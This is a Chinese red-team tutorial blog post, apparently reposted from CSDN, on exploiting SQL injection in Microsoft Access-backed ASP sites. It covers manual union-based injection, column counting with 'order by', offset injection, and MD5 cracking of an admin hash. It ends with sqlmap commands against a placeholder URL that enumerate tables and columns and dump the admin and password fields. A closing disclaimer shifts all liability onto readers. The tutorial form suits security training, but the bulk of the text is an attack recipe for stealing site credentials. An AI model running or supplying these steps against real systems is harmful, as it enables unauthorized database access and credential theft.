红队攻防实战之Access注入

若盛世将倾,深渊在侧,我辈当万死以赴

访问漏洞url:

红队攻防实战之Access注入_第1张图片

1.Access联合查询

判断是否有注入

and 1=1正常,and 1=2出错

红队攻防实战之Access注入_第2张图片

判断字段数

order by 7正常

红队攻防实战之Access注入_第3张图片

order by 8出错

红队攻防实战之Access注入_第4张图片

爆破出表名并判断回显点为2,5

红队攻防实战之Access注入_第5张图片

查看字段内容,将字段名填入回显点1

红队攻防实战之Access注入_第6张图片

MD5解密

红队攻防实战之Access注入_第7张图片

2.Access偏移注入

按上面的步骤判断出表名和字段数之后开始使用偏移注入

偏移量就是逐步增加或递减,直到出现结果。*表示可代替的字符串,用*代替7,返回界面依旧报错,然后用*代替6,依次递减。7-2=5,5表示admin_user表中的列名个数。

红队攻防实战之Access注入_第8张图片

7-3=4,4表示admin_user_count表中的列名个数。

红队攻防实战之Access注入_第9张图片

3.sqlmap工具注入

sqlmap.py -u http://x/index.asp?id=31 --tables --batch

注入信息检测

红队攻防实战之Access注入_第10张图片

注入出表名

红队攻防实战之Access注入_第11张图片

sqlmap.py -u http://x/index.asp?id=31 -T x --columns --batch

注入出字段名

红队攻防实战之Access注入_第12张图片

sqlmap.py -u http://x/index.asp?id=31 -T x -C "admin,password" --dump --batch

注入出字段的内容

红队攻防实战之Access注入_第13张图片

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85


你可能感兴趣的:(0.红队攻防,#,1.,红队实战,1.web攻防,安全,web安全,java,redis,php,开发语言)